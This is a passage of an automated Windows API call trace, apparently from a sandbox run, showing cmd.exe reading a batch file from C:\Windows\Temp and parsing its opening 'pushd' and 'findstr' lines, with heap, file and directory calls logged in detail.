batch script\r\n===============================================================\r\n") returned 2 [0175.277] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.277] GetFileType (hFile=0x94) returned 0x1 [0175.277] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.277] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9da [0175.277] GetProcessHeap () returned 0x19a8f1e0000 [0175.277] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fc1b0 [0175.277] GetProcessHeap () returned 0x19a8f1e0000 [0175.278] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fc1b0) returned 1 [0175.278] _tell (_FileHandle=3) returned 2522 [0175.278] _close (_FileHandle=3) returned 0 [0175.279] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0175.279] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0175.279] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.279] SetFilePointer (in: hFile=0x94, lDistanceToMove=2522, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9da [0175.279] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.279] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9da [0175.279] ReadFile (in: hFile=0x94, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.279] SetFilePointer (in: hFile=0x94, lDistanceToMove=2537, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9e9 [0175.279] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="pushd \"%~dp0\"\r\n", cbMultiByte=15, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="pushd \"%~dp0\"\r\nne ending\r\noot.html\r\nript may crash...\r\nr the batch script\r\n===============================================================\r\n") returned 15 [0175.279] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.279] GetFileType (hFile=0x94) returned 0x1 [0175.279] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.280] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9e9 [0175.280] GetProcessHeap () returned 0x19a8f1e0000 [0175.280] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fc1b0 [0175.280] GetProcessHeap () returned 0x19a8f1e0000 [0175.280] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x54) returned 0x19a8f1f8ca0 [0175.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd", nBufferLength=0x208, lpBuffer=0x43f9efe920, lpFilePart=0x43f9efe480 | out: lpBuffer="C:\\Windows\\Temp\\MAS_15344413.cmd", lpFilePart=0x43f9efe480*="MAS_15344413.cmd") returned 0x20 [0175.280] FindFirstFileW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), lpFindFileData=0x43f9efe1b0 | out: lpFindFileData=0x43f9efe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2000, cFileName="Windows", cAlternateFileName="")) returned 0x19a8f1f8ac0 [0175.280] FindClose (in: hFindFile=0x19a8f1f8ac0 | out: hFindFile=0x19a8f1f8ac0) returned 1 [0175.281] memcpy (in: _Dst=0x43f9efe926, _Src=0x43f9efe1dc, _Size=0xe | out: _Dst=0x43f9efe926) returned 0x43f9efe926 [0175.281] FindFirstFileW (in: lpFileName="C:\\Windows\\Temp" (normalized: "c:\\windows\\temp"), lpFindFileData=0x43f9efe1b0 | out: lpFindFileData=0x43f9efe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16b59ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3f3c25e5, ftLastAccessTime.dwHighDateTime=0x1da9886, ftLastWriteTime.dwLowDateTime=0x3f3c25e5, ftLastWriteTime.dwHighDateTime=0x1da9886, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2000, cFileName="Temp", cAlternateFileName="")) returned 0x19a8f1f8700 [0175.281] FindClose (in: hFindFile=0x19a8f1f8700 | out: hFindFile=0x19a8f1f8700) returned 1 [0175.281] memcpy (in: _Dst=0x43f9efe936, _Src=0x43f9efe1dc, _Size=0x8 | out: _Dst=0x43f9efe936) returned 0x43f9efe936 [0175.281] FindFirstFileW (in: lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), lpFindFileData=0x43f9efe1b0 | out: lpFindFileData=0x43f9efe1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f3c25e5, ftCreationTime.dwHighDateTime=0x1da9886, ftLastAccessTime.dwLowDateTime=0x3f3c25e5, ftLastAccessTime.dwHighDateTime=0x1da9886, ftLastWriteTime.dwLowDateTime=0x3f4a7656, ftLastWriteTime.dwHighDateTime=0x1da9886, nFileSizeHigh=0x0, nFileSizeLow=0x6d9ee, dwReserved0=0x0, dwReserved1=0x2000, cFileName="MAS_15344413.cmd", cAlternateFileName="MAS_15~1.CMD")) returned 0x19a8f1f8be0 [0175.281] FindClose (in: hFindFile=0x19a8f1f8be0 | out: hFindFile=0x19a8f1f8be0) returned 1 [0175.281] _wcsnicmp (_String1="MAS_15~1.CMD", _String2="MAS_15344413.cmd", _MaxCount=0x10) returned 75 [0175.281] memcpy (in: _Dst=0x43f9efe940, _Src=0x43f9efe1dc, _Size=0x20 | out: _Dst=0x43f9efe940) returned 0x43f9efe940 [0175.281] GetProcessHeap () returned 0x19a8f1e0000 [0175.281] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x32) returned 0x19a8f1e0e30 [0175.281] GetProcessHeap () returned 0x19a8f1e0000 [0175.283] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fc1b0) returned 1 [0175.285] _wcsicmp (_String1="pushd", _String2=")") returned 71 [0175.285] _wcsicmp (_String1="FOR", _String2="pushd") returned -10 [0175.285] _wcsicmp (_String1="FOR/?", _String2="pushd") returned -10 [0175.286] _wcsicmp (_String1="IF", _String2="pushd") returned -7 [0175.286] _wcsicmp (_String1="IF/?", _String2="pushd") returned -7 [0175.286] _wcsicmp (_String1="REM", _String2="pushd") returned 2 [0175.286] _wcsicmp (_String1="REM/?", _String2="pushd") returned 2 [0175.286] GetProcessHeap () returned 0x19a8f1e0000 [0175.286] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edc50 [0175.286] GetProcessHeap () returned 0x19a8f1e0000 [0175.286] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0175.286] GetProcessHeap () returned 0x19a8f1e0000 [0175.286] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0b30 [0175.286] _tell (_FileHandle=3) returned 2537 [0175.286] _close (_FileHandle=3) returned 0 [0175.286] _wcsicmp (_String1="pushd", _String2="DIR") returned 12 [0175.286] _wcsicmp (_String1="pushd", _String2="ERASE") returned 11 [0175.286] _wcsicmp (_String1="pushd", _String2="DEL") returned 12 [0175.286] _wcsicmp (_String1="pushd", _String2="TYPE") returned -4 [0175.286] _wcsicmp (_String1="pushd", _String2="COPY") returned 13 [0175.286] _wcsicmp (_String1="pushd", _String2="CD") returned 13 [0175.286] _wcsicmp (_String1="pushd", _String2="CHDIR") returned 13 [0175.286] _wcsicmp (_String1="pushd", _String2="RENAME") returned -2 [0175.287] _wcsicmp (_String1="pushd", _String2="REN") returned -2 [0175.287] _wcsicmp (_String1="pushd", _String2="ECHO") returned 11 [0175.287] _wcsicmp (_String1="pushd", _String2="SET") returned -3 [0175.287] _wcsicmp (_String1="pushd", _String2="PAUSE") returned 20 [0175.287] _wcsicmp (_String1="pushd", _String2="DATE") returned 12 [0175.287] _wcsicmp (_String1="pushd", _String2="TIME") returned -4 [0175.287] _wcsicmp (_String1="pushd", _String2="PROMPT") returned 3 [0175.287] _wcsicmp (_String1="pushd", _String2="MD") returned 3 [0175.287] _wcsicmp (_String1="pushd", _String2="MKDIR") returned 3 [0175.287] _wcsicmp (_String1="pushd", _String2="RD") returned -2 [0175.287] _wcsicmp (_String1="pushd", _String2="RMDIR") returned -2 [0175.287] _wcsicmp (_String1="pushd", _String2="PATH") returned 20 [0175.287] _wcsicmp (_String1="pushd", _String2="GOTO") returned 9 [0175.287] _wcsicmp (_String1="pushd", _String2="SHIFT") returned -3 [0175.287] _wcsicmp (_String1="pushd", _String2="CLS") returned 13 [0175.287] _wcsicmp (_String1="pushd", _String2="CALL") returned 13 [0175.287] _wcsicmp (_String1="pushd", _String2="VERIFY") returned -6 [0175.287] _wcsicmp (_String1="pushd", _String2="VER") returned -6 [0175.287] _wcsicmp (_String1="pushd", _String2="VOL") returned -6 [0175.287] _wcsicmp (_String1="pushd", _String2="EXIT") returned 11 [0175.287] _wcsicmp (_String1="pushd", _String2="SETLOCAL") returned -3 [0175.287] _wcsicmp (_String1="pushd", _String2="ENDLOCAL") returned 11 [0175.287] _wcsicmp (_String1="pushd", _String2="TITLE") returned -4 [0175.287] _wcsicmp (_String1="pushd", _String2="START") returned -3 [0175.287] _wcsicmp (_String1="pushd", _String2="DPATH") returned 12 [0175.287] _wcsicmp (_String1="pushd", _String2="KEYS") returned 5 [0175.287] _wcsicmp (_String1="pushd", _String2="MOVE") returned 3 [0175.288] _wcsicmp (_String1="pushd", _String2="PUSHD") returned 0 [0175.288] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.288] _wcsicmp (_String1="pushd", _String2="DIR") returned 12 [0175.288] _wcsicmp (_String1="pushd", _String2="ERASE") returned 11 [0175.288] _wcsicmp (_String1="pushd", _String2="DEL") returned 12 [0175.288] _wcsicmp (_String1="pushd", _String2="TYPE") returned -4 [0175.288] _wcsicmp (_String1="pushd", _String2="COPY") returned 13 [0175.289] _wcsicmp (_String1="pushd", _String2="CD") returned 13 [0175.289] _wcsicmp (_String1="pushd", _String2="CHDIR") returned 13 [0175.289] _wcsicmp (_String1="pushd", _String2="RENAME") returned -2 [0175.289] _wcsicmp (_String1="pushd", _String2="REN") returned -2 [0175.289] _wcsicmp (_String1="pushd", _String2="ECHO") returned 11 [0175.289] _wcsicmp (_String1="pushd", _String2="SET") returned -3 [0175.289] _wcsicmp (_String1="pushd", _String2="PAUSE") returned 20 [0175.289] _wcsicmp (_String1="pushd", _String2="DATE") returned 12 [0175.289] _wcsicmp (_String1="pushd", _String2="TIME") returned -4 [0175.289] _wcsicmp (_String1="pushd", _String2="PROMPT") returned 3 [0175.289] _wcsicmp (_String1="pushd", _String2="MD") returned 3 [0175.289] _wcsicmp (_String1="pushd", _String2="MKDIR") returned 3 [0175.289] _wcsicmp (_String1="pushd", _String2="RD") returned -2 [0175.289] _wcsicmp (_String1="pushd", _String2="RMDIR") returned -2 [0175.289] _wcsicmp (_String1="pushd", _String2="PATH") returned 20 [0175.289] _wcsicmp (_String1="pushd", _String2="GOTO") returned 9 [0175.289] _wcsicmp (_String1="pushd", _String2="SHIFT") returned -3 [0175.289] _wcsicmp (_String1="pushd", _String2="CLS") returned 13 [0175.289] _wcsicmp (_String1="pushd", _String2="CALL") returned 13 [0175.289] _wcsicmp (_String1="pushd", _String2="VERIFY") returned -6 [0175.289] _wcsicmp (_String1="pushd", _String2="VER") returned -6 [0175.289] _wcsicmp (_String1="pushd", _String2="VOL") returned -6 [0175.289] _wcsicmp (_String1="pushd", _String2="EXIT") returned 11 [0175.289] _wcsicmp (_String1="pushd", _String2="SETLOCAL") returned -3 [0175.289] _wcsicmp (_String1="pushd", _String2="ENDLOCAL") returned 11 [0175.289] _wcsicmp (_String1="pushd", _String2="TITLE") returned -4 [0175.289] _wcsicmp (_String1="pushd", _String2="START") returned -3 [0175.290] _wcsicmp (_String1="pushd", _String2="DPATH") returned 12 [0175.290] _wcsicmp (_String1="pushd", _String2="KEYS") returned 5 [0175.290] _wcsicmp (_String1="pushd", _String2="MOVE") returned 3 [0175.290] _wcsicmp (_String1="pushd", _String2="PUSHD") returned 0 [0175.290] GetProcessHeap () returned 0x19a8f1e0000 [0175.290] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x60) returned 0x19a8f1eaed0 [0175.290] GetProcessHeap () returned 0x19a8f1e0000 [0175.290] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eaed0, Size=0x38) returned 0x19a8f1eaed0 [0175.290] GetProcessHeap () returned 0x19a8f1e0000 [0175.290] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eaed0) returned 0x38 [0175.290] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0175.290] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0175.290] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x43f9efe7e0, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x43f9efe7c0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x43f9efe7c0*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0175.290] GetProcessHeap () returned 0x19a8f1e0000 [0175.290] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x44) returned 0x19a8f1f9220 [0175.291] GetProcessHeap () returned 0x19a8f1e0000 [0175.291] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x60) returned 0x19a8f1eaf20 [0175.291] GetProcessHeap () returned 0x19a8f1e0000 [0175.291] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eaf20, Size=0x38) returned 0x19a8f1eaf20 [0175.291] GetProcessHeap () returned 0x19a8f1e0000 [0175.291] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eaf20) returned 0x38 [0175.291] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff7bd731940 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0175.291] GetProcessHeap () returned 0x19a8f1e0000 [0175.291] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, Size=0x28) returned 0x19a8f1eb950 [0175.291] realloc (_Block=0x0, _Size=0x190) returned 0x19a8f5370f0 [0175.291] GetProcessHeap () returned 0x19a8f1e0000 [0175.291] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x32) returned 0x19a8f1e0e70 [0175.291] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x43f9efe700 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0175.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\Temp\\", nBufferLength=0x104, lpBuffer=0x43f9efe700, lpFilePart=0x43f9efe6e0 | out: lpBuffer="C:\\Windows\\Temp\\", lpFilePart=0x43f9efe6e0*=0x0) returned 0x10 [0175.291] GetFileAttributesW (lpFileName="C:\\Windows\\Temp" (normalized: "c:\\windows\\temp")) returned 0x10 [0175.291] FindFirstFileW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), lpFindFileData=0x43f9efe410 | out: lpFindFileData=0x43f9efe410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x19a8f1f8820 [0175.291] FindClose (in: hFindFile=0x19a8f1f8820 | out: hFindFile=0x19a8f1f8820) returned 1 [0175.292] memcpy (in: _Dst=0x43f9efe706, _Src=0x43f9efe43c, _Size=0xe | out: _Dst=0x43f9efe706) returned 0x43f9efe706 [0175.292] FindFirstFileW (in: lpFileName="C:\\Windows\\Temp" (normalized: "c:\\windows\\temp"), lpFindFileData=0x43f9efe410 | out: lpFindFileData=0x43f9efe410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16b59ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3f3c25e5, ftLastAccessTime.dwHighDateTime=0x1da9886, ftLastWriteTime.dwLowDateTime=0x3f3c25e5, ftLastWriteTime.dwHighDateTime=0x1da9886, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0x19a8f1f8a60 [0175.292] FindClose (in: hFindFile=0x19a8f1f8a60 | out: hFindFile=0x19a8f1f8a60) returned 1 [0175.292] memcpy (in: _Dst=0x43f9efe716, _Src=0x43f9efe43c, _Size=0x8 | out: _Dst=0x43f9efe716) returned 0x43f9efe716 [0175.292] GetFileAttributesW (lpFileName="C:\\Windows\\Temp" (normalized: "c:\\windows\\temp")) returned 0x10 [0175.292] SetCurrentDirectoryW (lpPathName="C:\\Windows\\Temp" (normalized: "c:\\windows\\temp")) returned 1 [0175.292] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\Temp") returned 1 [0175.292] GetProcessHeap () returned 0x19a8f1e0000 [0175.293] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ef670) returned 1 [0175.293] GetEnvironmentStringsW () returned 0x19a8f1ece20* [0175.293] GetProcessHeap () returned 0x19a8f1e0000 [0175.293] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0e) returned 0x19a8f1eeb50 [0175.293] memcpy (in: _Dst=0x19a8f1eeb50, _Src=0x19a8f1ece20, _Size=0xb0e | out: _Dst=0x19a8f1eeb50) returned 0x19a8f1eeb50 [0175.293] FreeEnvironmentStringsA (penv="=") returned 1 [0175.293] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff7bd731940 | out: lpBuffer="C:\\Windows\\Temp") returned 0xf [0175.293] GetProcessHeap () returned 0x19a8f1e0000 [0175.294] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0e70) returned 1 [0175.294] GetEnvironmentVariableW (in: lpName="=C:", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0xf [0175.294] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.294] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0175.294] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.294] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0175.295] _get_osfhandle (_FileHandle=0) returned 0x20 [0175.295] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0175.295] SetConsoleInputExeNameW () returned 0x1 [0175.295] GetConsoleOutputCP () returned 0x1b5 [0175.295] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.295] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.296] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10 [0175.296] _open_osfhandle (_OSFileHandle=0x10, _Flags=8) returned 3 [0175.296] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.296] SetFilePointer (in: hFile=0x10, lDistanceToMove=2537, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9e9 [0175.296] GetProcessHeap () returned 0x19a8f1e0000 [0175.297] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaf20) returned 1 [0175.297] GetProcessHeap () returned 0x19a8f1e0000 [0175.297] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9220) returned 1 [0175.298] GetProcessHeap () returned 0x19a8f1e0000 [0175.298] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaed0) returned 1 [0175.298] GetProcessHeap () returned 0x19a8f1e0000 [0175.298] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0b30) returned 1 [0175.298] GetProcessHeap () returned 0x19a8f1e0000 [0175.298] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0175.299] GetProcessHeap () returned 0x19a8f1e0000 [0175.299] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edc50) returned 1 [0175.299] GetProcessHeap () returned 0x19a8f1e0000 [0175.299] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0e30) returned 1 [0175.299] GetProcessHeap () returned 0x19a8f1e0000 [0175.300] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8ca0) returned 1 [0175.300] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.300] SetFilePointer (in: hFile=0x10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9e9 [0175.300] ReadFile (in: hFile=0x10, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.300] SetFilePointer (in: hFile=0x10, lDistanceToMove=2571, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa0b [0175.300] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=">nul findstr /v \"$\" \"%~nx0\" && (\r\n", cbMultiByte=34, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=">nul findstr /v \"$\" \"%~nx0\" && (\r\n\r\nript may crash...\r\nr the batch script\r\n===============================================================\r\n") returned 34 [0175.300] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.300] GetFileType (hFile=0x10) returned 0x1 [0175.300] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.300] SetFilePointer (in: hFile=0x10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa0b [0175.300] GetProcessHeap () returned 0x19a8f1e0000 [0175.300] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fc1b0 [0175.301] GetProcessHeap () returned 0x19a8f1e0000 [0175.301] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x54) returned 0x19a8f1f8b80 [0175.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd", nBufferLength=0x208, lpBuffer=0x43f9efe920, lpFilePart=0x43f9efe480 | out: lpBuffer="C:\\Windows\\Temp\\MAS_15344413.cmd", lpFilePart=0x43f9efe480*="MAS_15344413.cmd") returned 0x20 [0175.301] FindFirstFileW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), lpFindFileData=0x43f9efe1b0 | out: lpFindFileData=0x43f9efe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xed9858d4, cFileName="Windows", cAlternateFileName="")) returned 0x19a8f1f8d60 [0175.301] FindClose (in: hFindFile=0x19a8f1f8d60 | out: hFindFile=0x19a8f1f8d60) returned 1 [0175.301] memcpy (in: _Dst=0x43f9efe926, _Src=0x43f9efe1dc, _Size=0xe | out: _Dst=0x43f9efe926) returned 0x43f9efe926 [0175.301] FindFirstFileW (in: lpFileName="C:\\Windows\\Temp" (normalized: "c:\\windows\\temp"), lpFindFileData=0x43f9efe1b0 | out: lpFindFileData=0x43f9efe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16b59ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3f3c25e5, ftLastAccessTime.dwHighDateTime=0x1da9886, ftLastWriteTime.dwLowDateTime=0x3f3c25e5, ftLastWriteTime.dwHighDateTime=0x1da9886, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xed9858d4, cFileName="Temp", cAlternateFileName="")) returned 0x19a8f1f8700 [0175.302] FindClose (in: hFindFile=0x19a8f1f8700 | out: hFindFile=0x19a8f1f8700) returned 1 [0175.302] memcpy (in: _Dst=0x43f9efe936, _Src=0x43f9efe1dc, _Size=0x8 | out: _Dst=0x43f9efe936) returned 0x43f9efe936 [0175.302] FindFirstFileW (in: lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), lpFindFileData=0x43f9efe1b0 | out: lpFindFileData=0x43f9efe1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f3c25e5, ftCreationTime.dwHighDateTime=0x1da9886, ftLastAccessTime.dwLowDateTime=0x3f3c25e5, ftLastAccessTime.dwHighDateTime=0x1da9886, ftLastWriteTime.dwLowDateTime=0x3f4a7656, ftLastWriteTime.dwHighDateTime=0x1da9886, nFileSizeHigh=0x0, nFileSizeLow=0x6d9ee, dwReserved0=0x0, dwReserved1=0xed9858d4, cFileName="MAS_15344413.cmd", cAlternateFileName="MAS_15~1.CMD")) returned 0x19a8f1f8a60 [0175.302] FindClose (in: hFindFile=0x19a8f1f8a60 | out: hFindFile=0x19a8f1f8a60) returned 1 [0175.302] _wcsnicmp (_String1="MAS_15~1.CMD", _String2="MAS_15344413.cmd", _MaxCount=0x10) returned 75 [0175.302] memcpy (in: _Dst=0x43f9efe940, _Src=0x43f9efe1dc, _Size=0x20 | out: _Dst=0x43f9efe940) returned 0x43f9efe940 [0175.302] GetProcessHeap () returned 0x19a8f1e0000 [0175.302] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x32) returned 0x19a8f1e0b30 [0175.302] GetProcessHeap () returned 0x19a8f1e0000 [0175.303] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fc1b0) returned 1 [0175.303] GetProcessHeap () returned 0x19a8f1e0000 [0175.303] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e09b0 [0175.303] GetProcessHeap () returned 0x19a8f1e0000 [0175.303] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1e5950 [0175.303] _wcsicmp (_String1="FOR", _String2="findstr") returned 6 [0175.303] _wcsicmp (_String1="FOR/?", _String2="findstr") returned 6 [0175.303] _wcsicmp (_String1="IF", _String2="findstr") returned 3 [0175.303] _wcsicmp (_String1="IF/?", _String2="findstr") returned 3 [0175.303] _wcsicmp (_String1="REM", 